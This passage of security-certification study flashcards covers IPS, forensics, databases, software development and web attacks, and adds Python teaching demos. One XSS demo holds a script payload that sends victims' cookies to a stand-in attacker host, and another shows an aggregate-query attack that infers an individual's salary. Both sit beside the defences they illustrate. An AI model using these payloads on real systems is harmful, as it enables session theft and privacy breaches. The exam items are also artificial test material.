You come across an advanced piece of polymorphic malware that uses a custom communications protocol for network traffic. This protocol has a distinctive signature in its header. Which tool is best suited to mitigate this malware by preventing the packets from traversing the network?

A. Antimalware

B. Stateful firewall

C. Intrusion detection system (IDS)

D. Intrusion prevention system (IPS)

A

D. The intrusion prevention system is the best answer because these systems can drop packets that contain a specific signature. Although some antimalware software might be able to do this as well, the capability is not a universal feature of that class of product. An IDS only detects and alerts on the traffic; it does not stop the packets.

98
Q

Which of the following does not describe a reciprocal agreement?

A. The agreement is enforceable.

B. It is a cheap solution.

C. It may be able to be implemented right after a disaster.

D. It could overwhelm a current data processing site.

A

A. A reciprocal agreement is not enforceable, meaning that the company that agreed to let the damaged company work out of its facility can decide not to allow this to take place. A reciprocal agreement is a better secondary backup option if the original plan falls through.

99
Q

After a computer forensic investigator seizes a computer during a crime investigation, what is the next step?

A. Label and put it into a container, and then label the container

B. Dust the evidence for fingerprints

C. Make an image copy of the disks

D. Lock the evidence in the safe

A

C. Several steps need to be followed when gathering and extracting evidence from a scene. Once a computer has been confiscated, the first thing the computer forensics team should do is make an image of the hard drive. The team will work from this image instead of the original hard drive so that the original stays in a pristine state and the evidence on the drive is not accidentally corrupted or modified.

100
Q

Which of the following is a necessary characteristic of evidence for it to be admissible?

A. It must be real.

B. It must be noteworthy.

C. It must be reliable.

D. It must be important.

A

C. For evidence to be admissible, it must be relevant, complete, sufficient, and reliable to the case. For evidence to be reliable, it must be consistent with fact and must not be based on opinion or be circumstantial.

101
Q

On your first day in a new job, you are invited to a meeting with attorneys representing a company for which your company provides infrastructure services. You learn that there is a major investigation underway into allegations that one of your company’s system administrators improperly accessed mailboxes belonging to this client. Based on what you know so far, which type of investigation is this likeliest to be?

A. Administrative

B. Regulatory

C. Criminal

D. Civil

A

D. The allegations, depending on the details, could point to any of the four types of investigations. However, since you are meeting with attorneys representing this client, it is likeliest that they are considering (or taking) civil action against your company. None of the other three types of investigations would normally involve meetings with a client’s attorneys.

As an aside, in this situation you would obviously want to ensure that your own company’s attorneys were present too.

102
Q

A system has been patched many times and has recently become infected with a dangerous virus. If antimalware software indicates that disinfecting a file may damage it, what is the correct action?

A. Disinfect the file and contact the vendor

B. Back up the data and disinfect the file

C. Replace the file with the file saved the day before

D. Restore an uninfected version of the patched file from backup media.

A

D. Some files cannot be properly sanitized by the antivirus software without destroying them or affecting their functionality. So, the administrator must replace such a file with a known uninfected file. Plus, the administrator needs to make sure he has the patched version of the file, or else he could be introducing other problems. Answer C is not the best answer because the administrator may not know the file was clean yesterday, so just restoring yesterday’s file may put him right back in the same boat.

103
Q

What is the purpose of polyinstantiation?

A. To restrict lower-level subjects from accessing low-level information

B. To make a copy of an object and modify the attributes of the second copy

C. To create different objects that will react in different ways to the same input

D. To create different objects that will take on inheritance attributes from their class

A

B. Instantiation is what happens when an object is created from a class. Polyinstantiation is when more than one object is made and the other copy is modified to have different attributes. This can be done for several reasons. The example given in the chapter was a way to use polyinstantiation for security purposes to ensure that a lower-level subject could not access an object at a higher level.
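The security use described above, as an added, runnable illustration written for this card (it is not code from the book): a tiny multilevel relation in which the same primary key can exist once per classification level, so a low-cleared user’s insert never collides with, and therefore never reveals, a higher-level row. The ship/cargo columns, the three classification levels and the sample rows are assumptions chosen for the example.

```python
"""Polyinstantiation in a multilevel relation.

Added example for this flashcard, not code from the book. The ship/cargo
columns, the three classification levels and the sample rows are assumed.
"""
from dataclasses import dataclass

LEVELS = {"UNCLASSIFIED": 0, "CONFIDENTIAL": 1, "SECRET": 2}


@dataclass(frozen=True)
class Row:
    ship: str      # apparent primary key
    cargo: str
    level: str     # classification of this particular instance of the tuple


class MultilevelTable:
    """The real key is (ship, level): one tuple may have one instance per level."""

    def __init__(self):
        self._rows = {}  # (ship, level) -> Row

    def insert(self, subject_level, ship, cargo):
        """Write at the subject's own level.

        If an instance already exists at a higher level, a second, lower
        instance is created instead of raising a duplicate-key error. A
        duplicate-key error here would tell the low-level user that a
        classified row with this key exists (an inference channel).
        """
        if subject_level not in LEVELS:
            raise ValueError(f"unknown level {subject_level!r}")
        self._rows[(ship, subject_level)] = Row(ship, cargo, subject_level)

    def select(self, subject_level, ship):
        """Return the instance at the highest level the subject is cleared
        to read (read down, never read up), or None if nothing is visible."""
        clearance = LEVELS[subject_level]
        visible = [
            row for (key, level), row in self._rows.items()
            if key == ship and LEVELS[level] <= clearance
        ]
        return max(visible, key=lambda r: LEVELS[r.level]) if visible else None

    def instance_count(self, ship):
        return sum(1 for (key, _level) in self._rows if key == ship)


def demo():
    """Constructed scenario: a Secret row exists; an Unclassified user inserts
    the same key. Each subject then reads the instance at its own level."""
    table = MultilevelTable()
    table.insert("SECRET", "Enterprise", "weapons")
    table.insert("UNCLASSIFIED", "Enterprise", "food")
    return {
        "unclassified_sees": table.select("UNCLASSIFIED", "Enterprise").cargo,
        "confidential_sees": table.select("CONFIDENTIAL", "Enterprise").cargo,
        "secret_sees": table.select("SECRET", "Enterprise").cargo,
        "instances": table.instance_count("Enterprise"),
    }


if __name__ == "__main__":
    print(demo())
```

The point to notice is the insert path: a conventional unique-key constraint would either reject the Unclassified write (leaking that a Secret row exists) or overwrite the Secret row (letting a low subject modify high data). Keeping one instance per level avoids both.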

104
Q

Which of the following techniques or set of techniques is used to deter database inference attacks?

A. Partitioning, cell suppression, and noise and perturbation

B. Controlling access to the data dictionary

C. Partitioning, cell suppression, and small query sets

D. Partitioning, noise and perturbation, and small query sets

A

A. Partitioning means to logically split the database into parts. Views then dictate which users can view specific parts. Cell suppression means that specific cells are not viewable by certain users. And noise and perturbation is when bogus information is inserted into the database to try to give potential attackers incorrect information.
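An added, runnable illustration of the inference problem and of two of the three countermeasures named in the answer, cell suppression and noise/perturbation (example code written for this card, not from the book). Partitioning is only noted in the comments: in this setting it amounts to putting the name column behind a view that statistical users cannot filter on. The employee table, the salaries, the minimum cell size of 3 and the ±5000 noise bound are assumptions chosen for the example.

```python
"""Database inference attack and two countermeasures: cell suppression and
noise/perturbation.

Added example for this flashcard, not code from the book. The table, the
salaries, MIN_CELL_SIZE and NOISE are assumptions chosen for illustration.
"""
import random
import sqlite3

EMPLOYEES = [                        # constructed sample rows
    ("alice", "research", 90000),
    ("bob", "research", 70000),
    ("carol", "research", 80000),
    ("dave", "sales", 60000),
    ("erin", "sales", 65000),
]
MIN_CELL_SIZE = 3   # suppress any aggregate to which fewer rows contribute
NOISE = 5000        # bound of the random perturbation added to an aggregate


def open_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE employee(name TEXT, dept TEXT, salary INTEGER)")
    con.executemany("INSERT INTO employee VALUES (?, ?, ?)", EMPLOYEES)
    # Partitioning would be a view such as
    #   CREATE VIEW payroll_stats AS SELECT dept, salary FROM employee
    # offered to reporting users instead of the base table, so they cannot
    # single out a person by name as the tracker attack below does.
    return con


def aggregate(con, where, params, policy="none", rng=None):
    """SUM(salary) over the rows matching `where`, under one policy:
      none      raw answer (vulnerable)
      suppress  cell suppression: refuse when too few rows contribute
      perturb   noise and perturbation: add bounded random noise
    `where` is a fixed fragment written by the application (only the values
    are bound as parameters); it must never be taken from the requester.
    """
    total, count = con.execute(
        f"SELECT SUM(salary), COUNT(*) FROM employee WHERE {where}", params
    ).fetchone()
    if policy == "suppress" and count < MIN_CELL_SIZE:
        return None
    if policy == "perturb":
        return total + rng.randint(-NOISE, NOISE)
    return total


def infer_salary(con, target, dept, policy="none", seed=0):
    """Tracker attack: two permitted aggregates that differ by exactly one row.
    Their difference is the individual salary the requester is not allowed
    to read directly. Returns None when a countermeasure blocks the attack."""
    rng = random.Random(seed)
    whole = aggregate(con, "dept = ?", (dept,), policy, rng)
    rest = aggregate(con, "dept = ? AND name <> ?", (dept, target), policy, rng)
    if whole is None or rest is None:
        return None
    return whole - rest


def demo():
    con = open_db()
    return {
        "raw": infer_salary(con, "alice", "research"),
        "suppressed": infer_salary(con, "alice", "research", policy="suppress"),
        "perturbed": infer_salary(con, "alice", "research", policy="perturb"),
    }


if __name__ == "__main__":
    print(demo())
```

Suppression stops the attack outright because the second query covers only two rows. Perturbation only blunts it: the attacker still learns the salary to within twice the noise bound, and with fresh noise on every call can average repeated queries, which is why perturbation is paired with query limits or auditing in practice.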

105
Q

An online transaction processing (OLTP) system that detects an invalid transaction should do which of the following?

A. Roll back and rewrite over original data

B. Terminate all transactions until properly addressed

C. Write a report to be reviewed

D. Checkpoint each data entry

A

C. This can seem like a tricky question. It states that the system has detected an invalid transaction, which is most likely a user error. This error should be logged so it can be reviewed. After the review, the supervisor, or whoever makes this type of decision, will decide whether or not it was a mistake and, if so, investigate it as needed. If the system had a glitch, power fluctuation, hang-up, or any other software- or hardware-related error, it would not be an invalid transaction, and in that case the system would carry out a rollback function.

106
Q

Which of the following are rows and columns within relational databases?

A. Rows and tuples

B. Attributes and rows

C. Keys and views

D. Tuples and attributes

A

D. In a relational database, a row is referred to as a tuple, whereas a column is referred to as an attribute.

107
Q

Databases can record transactions in real time, which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what’s known as the ACID test. Which of the following are incorrect characteristics of the ACID test?

i. Atomicity Divides transactions into units of work and ensures that all modifications take effect or none takes effect.
ii. Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases.
iii. Isolation Transactions execute in isolation until completed, without interacting with other transactions.
iv. Durability Once the transaction is verified as inaccurate on all systems, it is committed and the databases cannot be rolled back.

A. i, ii

B. ii. iii

C. ii, iv

D. iv

A

D. The following are correct characteristics of the ACID test:

  • Atomicity Divides transactions into units of work and ensures that all modifications take effect or none take effect. Either the changes are committed or the database is rolled back.
  • Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases.
  • Isolation Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed.
  • Durability Once the transaction is verified as accurate on all systems, it is committed and the databases cannot be rolled back.
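The atomicity and consistency properties from the list above, as an added, runnable illustration (example code written for this card, not from the book): a funds transfer is run once as two separately committed statements and once as a single unit of work, against a CHECK constraint that stands in for the database’s integrity policy. The account table, the constraint and the balances are constructed for the example; isolation is not shown, since SQLite serializes writers on its own.

```python
"""Atomicity and consistency of a transaction, shown with sqlite3.

Added example for this flashcard, not code from the book. The account
table, the CHECK constraint and the balances are constructed for it.
"""
import sqlite3


def new_ledger():
    # isolation_level=None puts the connection in autocommit mode, so the
    # transaction boundaries below are exactly the BEGIN/COMMIT/ROLLBACK we issue.
    con = sqlite3.connect(":memory:", isolation_level=None)
    con.execute(
        "CREATE TABLE account("
        "name TEXT PRIMARY KEY, "
        "balance INTEGER NOT NULL CHECK (balance >= 0))"   # the integrity rule
    )
    con.executemany("INSERT INTO account VALUES (?, ?)", [("alice", 100), ("bob", 50)])
    return con


def balances(con):
    return dict(con.execute("SELECT name, balance FROM account ORDER BY name"))


def transfer_non_atomic(con, src, dst, amount):
    """Two statements, each committed on its own. If the debit violates the
    CHECK constraint, the credit has already been made permanent."""
    con.execute("UPDATE account SET balance = balance + ? WHERE name = ?", (amount, dst))
    con.execute("UPDATE account SET balance = balance - ? WHERE name = ?", (amount, src))


def transfer_atomic(con, src, dst, amount):
    """Both statements form one unit of work: either both take effect or,
    on any failure, the database is rolled back to where it started."""
    con.execute("BEGIN")
    try:
        con.execute("UPDATE account SET balance = balance + ? WHERE name = ?", (amount, dst))
        con.execute("UPDATE account SET balance = balance - ? WHERE name = ?", (amount, src))
        con.execute("COMMIT")   # durability: from here the change survives a crash
        return True
    except sqlite3.IntegrityError:
        con.execute("ROLLBACK")
        return False


def demo():
    """bob (balance 50) tries to send 80 to alice under each approach."""
    con = new_ledger()
    try:
        transfer_non_atomic(con, "bob", "alice", 80)
    except sqlite3.IntegrityError:
        pass                      # debit refused, but the credit already stuck
    partial = balances(con)       # {'alice': 180, 'bob': 50}: 80 created from nothing

    con = new_ledger()
    rejected = transfer_atomic(con, "bob", "alice", 80)
    intact = balances(con)        # {'alice': 100, 'bob': 50}
    committed = transfer_atomic(con, "alice", "bob", 30)
    after = balances(con)         # {'alice': 70, 'bob': 80}
    return partial, rejected, intact, committed, after


if __name__ == "__main__":
    print(demo())
```

The non-atomic version is the integrity threat the card describes: the constraint still fires, but only after the first half of the work has been committed, so the ledger ends up with money that was never debited from anyone.
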
108
Q

John is a manager of the application development department within his company. He needs to make sure his team is carrying out all of the correct testing types and at the right times of the development stages. Which of the following accurately describe types of software testing that should be carried out?

i. Unit testing Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions.
ii. Integration testing Verifying that components work together as outlined in design specifications.
iii. Acceptance testing Ensuring that the code meets customer requirements.
iv. Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection.

A. i, ii

B. ii, iii

C. i, ii, iv

D. i, ii, iii, iv

A

D. There are different types of tests the software should go through because there are different potential flaws we will be looking for. The following are some of the most common testing approaches:

  • Unit testing Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions
  • Integration testing Verifying that components work together as outlined in design specifications
  • Acceptance testing Ensuring that the code meets customer requirements
  • Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection
109
Q

Marge has to choose a software development methodology that her team should follow. The application that her team is responsible for developing is a critical application that can have few to no errors. Which of the following best describes the type of methodology her team should follow?

A. Cleanroom

B. Joint Analysis Development (JAD)

C. Rapid Application Development (RAD)

D. Reuse methodology

A

A. The listed software development methodologies and their definitions are as follows:

  • Joint Analysis Development (JAD) A methodology that uses a team approach in application development in a workshop-oriented environment.
  • Rapid Application Development (RAD) A methodology that combines the use of prototyping and iterative development procedures with the goal of accelerating the software development process.
  • Reuse methodology A methodology that approaches software development by using progressively developed code. Reusable programs are evolved by gradually modifying pre-existing prototypes to customer specifications. Since the reuse methodology does not require programs to be built from scratch, it drastically reduces both development cost and time.
  • Cleanroom An approach that attempts to prevent errors or mistakes by following structured and formal methods of developing and testing. This approach is used for high-quality and critical applications that will be put through a strict certification process.
110
Q

Which of the following is the second level of the Capability Maturity Model Integration?

A. Repeatable

B. Defined

C. Managed

D. Optimizing

A

A. The five levels of the Capability Maturity Model Integration are

  • Initial Development process is ad hoc or even chaotic. The company does not use effective management procedures and plans. There is no assurance of consistency, and quality is unpredictable. Success is usually the result of individual heroics.
  • Repeatable A formal management structure, change control, and quality assurance are in place. The company can properly repeat processes throughout each project. The company does not have formal process models defined.
  • Defined Formal procedures are in place that outline and define processes carried out in each project. The organization has a way to allow for quantitative process improvement.
  • Managed The company has formal processes in place to collect and analyze quantitative data, and metrics are defined and fed into the process-improvement program.
  • Optimizing The company has budgeted and integrated plans for continuous process improvement.
111
Q

One of the characteristics of object-oriented programming is deferred commitment. Which of the following is the best description for this characteristic?

A. The building blocks of software are autonomous objects, cooperating through the exchange of messages.

B. The internal components of an object can be redefined without changing other parts of the system.

C. Classes are reused by other programs, though they may be refined through inheritance.

D. Object-oriented analysis, design, and modeling map to business needs and solutions.

A

B. The characteristics and their associated definitions are listed as follows:

  • Modularity Autonomous objects, cooperation through exchanges of messages.
  • Deferred commitment The internal components of an object can be redefined without changing other parts of the system.
  • Reusability Refining classes through inheritance. Other programs using the same objects.
  • Naturalness Object-oriented analysis, design, and modeling map to business needs and solutions.
112
Q

Which of the following has an incorrect attack-to-definition mapping?

A. EBJ XSS attack Content processing stages performed by the client, typically in client-side Java.

B. Nonpersistent XSS attack Improper sanitation of response from a web client.

C. Persistent XSS attack Data provided by attackers is saved on the server.

D. DOM-based XSS attack Content processing stages performed by the client, typically in client-side JavaScript.

A

A. The nonpersistent cross-site scripting vulnerability is when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response. The persistent XSS vulnerability occurs when the data provided by the attacker is saved by the server and then permanently displayed on “normal” pages returned to other users in the course of regular browsing without proper HTML escaping. DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.
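The nonpersistent and persistent cases described above, each beside the output escaping that closes them, as an added, runnable illustration (example code written for this card, not from the book). The page templates, the `q` parameter, the guest-book class and the payload are constructed for the example; DOM-based XSS occurs in client-side JavaScript and is not shown here.

```python
"""Nonpersistent (reflected) and persistent (stored) XSS, each beside the
output escaping that closes it.

Added example for this flashcard, not code from the book. The page
templates, the parameter name and the payload are constructed for it;
DOM-based XSS lives in client-side JavaScript and is not shown here.
"""
import html
from urllib.parse import parse_qs, urlencode

# Constructed payload: sends the victim's cookies to an attacker-controlled
# host (.example is a reserved TLD, so this resolves nowhere).
PAYLOAD = "<script>new Image().src='//attacker.example/?c='+document.cookie</script>"


def attack_query_string():
    """What a phishing link would carry: q=<url-encoded payload>."""
    return urlencode({"q": PAYLOAD})


def search_page_vulnerable(query_string):
    """Nonpersistent XSS: the q parameter is echoed into the page unescaped."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for {q}</h1>"


def search_page_fixed(query_string):
    """Same page with HTML escaping applied at the point of output."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


class GuestBook:
    """Persistent XSS: attacker input is stored once and rendered to every
    later visitor. escape_output=True is the fix; the stored data is left
    as submitted, and escaping happens where the HTML is generated."""

    def __init__(self, escape_output):
        self.escape_output = escape_output
        self.comments = []

    def post(self, comment):
        self.comments.append(comment)

    def render(self):
        items = (
            html.escape(c, quote=True) if self.escape_output else c
            for c in self.comments
        )
        return "<ul>" + "".join(f"<li>{c}</li>" for c in items) + "</ul>"


def contains_script(page):
    """Crude check used by the demo: does a live <script> element survive?"""
    return "<script>" in page.lower()


def demo():
    qs = attack_query_string()
    open_book, fixed_book = GuestBook(escape_output=False), GuestBook(escape_output=True)
    open_book.post(PAYLOAD)
    fixed_book.post(PAYLOAD)
    return {
        "reflected_vulnerable": contains_script(search_page_vulnerable(qs)),
        "reflected_fixed": contains_script(search_page_fixed(qs)),
        "stored_vulnerable": contains_script(open_book.render()),
        "stored_fixed": contains_script(fixed_book.render()),
    }


if __name__ == "__main__":
    print(demo())
```

`html.escape` is the right encoder only for HTML body and attribute context; data placed inside a JavaScript string, a URL or a CSS value needs that context’s own encoding, and a Content Security Policy limits the damage when an escape is missed.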

113
Q

John is reviewing database products. He needs a product that can manipulate a standard set of data for his company’s business logic needs. Which of the following should the necessary product implement?

A. Relational database

B. Object-relational database

C. Network database

D. Dynamic-static

A

B. An object-relational database (ORD) or object-relational database management system (ORDBMS) is a relational database with a software front end that is written in an object-oriented programming language. Different companies will have different business logic that needs to be carried out on the stored data. Allowing programmers to develop this front-end software piece allows the business logic procedures to be used by requesting applications and the data within the database.

114
Q

ActiveX Data Objects (ADO) is an API that allows applications to access back-end database systems. It is a set of ODBC interfaces that exposes the functionality of data sources through accessible objects. Which of the following are incorrect characteristics of ADO?

i. It’s a low-level data access programming interface to an underlying data access technology (such as OLE DB).
ii. It’s a set of COM objects for accessing data sources, not just database access.
iii. It allows a developer to write programs that access data without knowing how the database is implemented.
iv. SQL commands are required to access a database when using ADO.

A. i, iv

B. ii, iii

C. i, ii, iii

D. i, ii, iii, iv

A

A. The following are correct characteristics of ADO:

  • It’s a high-level data access programming interface to an underlying data access technology (such as OLE DB).
  • It’s a set of COM objects for accessing data sources, not just database access.
  • It allows a developer to write programs that access data without knowing how the database is implemented.
  • SQL commands are not required to access a database when using ADO.

115
Q

Database software performs three main types of integrity services: semantic, referential, and entity. Which of the following correctly describes one of these services?

i. A semantic integrity mechanism makes sure structural and semantic rules are enforced.
ii. A database has referential integrity if all foreign keys reference existing primary keys.
iii. Entity integrity guarantees that the tuples are uniquely identified by primary key values.

A. ii

B. ii, iii

C. i, ii, iii

D. i, ii

A

C. A semantic integrity mechanism makes sure structural and semantic rules are enforced. These rules pertain to data types, logical values, uniqueness constraints, and operations that could adversely affect the structure of the database. A database has referential integrity if all foreign keys reference existing primary keys. There should be a mechanism in place that ensures no foreign key contains a reference to a primary key of a nonexistent record, or a null value. Entity integrity guarantees that the tuples are uniquely identified by primary key values. For the sake of entity integrity, every tuple must contain one primary key. If it does not have a primary key, it cannot be referenced by the database.

116
Q

Which of the following is not very useful in assessing the security of acquired software?

A. The reliability and maturity of the vendor

B. The NIST’s National Software Reference Library

C. Third-party vulnerability assessments

D. In-house code reviews

A

B. The National Software Reference Library (NSRL) is the only term that was not addressed in this chapter. It comprises a collection of digital signatures of known, traceable software applications intended to assist in the investigation of crimes involving computers. All three other answers are part of a rigorous assessment of the security of acquired software.

117
Q

Sandy has just started as the manager of software development at a new company. As she interviews her new team members, she is finding out a few things that may need to be approached differently. Programmers currently develop software code and upload it to a centralized server for backup purposes. The server software does not have versioning control capability, so sometimes the end software product contains outdated code elements. She has also discovered that many in-house business software packages follow the Common Object Request Broker Architecture, which does not necessarily allow for easy reuse of distributed web services available throughout the network. One of the team members has combined several open API functionalities within a business-oriented software package.

Which of the following is the best technology for Sandy’s team to implement as it pertains to the previous scenario?

A. Computer-aided software engineering tools

B. Software configuration management

C. Software development life-cycle management

D. Software engineering best practices

A

B. Software configuration management (SCM) identifies the attributes of software at various points in time, and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release.

118
Q

Sandy has just started as the manager of software development at a new company. As she interviews her new team members, she is finding out a few things that may need to be approached differently. Programmers currently develop software code and upload it to a centralized server for backup purposes. The server software does not have versioning control capability, so sometimes the end software product contains outdated code elements. She has also discovered that many in-house business software packages follow the Common Object Request Broker Architecture, which does not necessarily allow for easy reuse of distributed web services available throughout the network. One of the team members has combined several open API functionalities within a business-oriented software package.

Which best describes the approach Sandy’s team member took when creating the business-oriented software package mentioned within the scenario?

A. Software as a Service

B. Cloud computing

C. Web services

D. Mashup

A

D. A mashup is the combination of functionality, data, and presentation capabilities of two or more sources to provide some type of new service or functionality. Open APIs and data sources are commonly aggregated and combined to provide a more useful and powerful resource.

119
Q

Karen wants her team to develop software that allows her company to take advantage of and use many of the web services currently available by other companies. Which of the following best describes the components that need to be in place and what their roles are?

A. Web service provides the application functionality. Universal Description, Discovery, and Integration describes the web service’s specifications. The Web Services Description Language provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service.

B. Web service provides the application functionality. The Web Services Description Language describes the web service’s specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service.

C. Web service provides the application functionality. The Web Services Description Language describes the web service’s specifications. The Simple Object Access Protocol provides the mechanisms for web services to be posted and discovered. Universal Description, Discovery, and Integration allows for the exchange of messages between a requester and provider of a web service.

D. Web service provides the application functionality. The Simple Object Access Protocol describes the web service’s specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Web Services Description Language allows for the exchange of messages between a requester and provider of a web service.

A

B. Web service provides the application functionality. WSDL describes the web service’s specifications. UDDI provides the mechanisms for web services to be posted and discovered. SOAP allows for the exchange of messages between a requester and provider of a web service.

120
Q

Brad is a new security administrator within a retail company. He is discovering several issues that his security team needs to address to better secure their organization overall. When reviewing different web server logs, he finds several HTTP server requests with the characters “%20” and “../”. The web server software ensures that users input the correct information within the forms that are presented to them via their web browsers. Brad identifies that the organization has a two-tier network architecture in place, which allows the web servers to directly interact with the back-end database.

Which of the following best describes attacks that could be taking place against this organization?

A. Cross-site scripting and certification stealing

B. URL encoding and directory traversal attacks

C. Parameter validation manipulation and session management attacks

D. Replay and password brute-force attacks

A

B. The characters “%20” are encoding values that attackers commonly use in URL encoding attacks. These encoding values can be used to bypass web server filtering rules and can result in the attacker being able to gain unauthorized access to components of the web server. The characters “../” can be used by attackers in similar web server requests, which instruct the web server software to traverse directories that should be inaccessible. This is commonly referred to as a path or directory traversal attack.

121
Q

Brad is a new security administrator within a retail company. He is discovering several issues that his security team needs to address to better secure their organization overall. When reviewing different web server logs, he finds several HTTP server requests with the characters “%20” and “../”. The web server software ensures that users input the correct information within the forms that are presented to them via their web browsers. Brad identifies that the organization has a two-tier network architecture in place, which allows the web servers to directly interact with the back-end database.

Pertaining to the network architecture described in the previous scenario, which of the following attack types should Brad be concerned with?

A. Parameter validation attack

B. Injection attack

C. Cross-site scripting

D. Database connector attack

A

B. The current architecture allows for web server software to directly communicate with a back-end database. Brad should ensure that proper database access authentication is taking place so that SQL injection attacks cannot be carried out. In a SQL injection attack the attacker sends over input values that the database carries out as commands and can allow authentication to be successfully bypassed.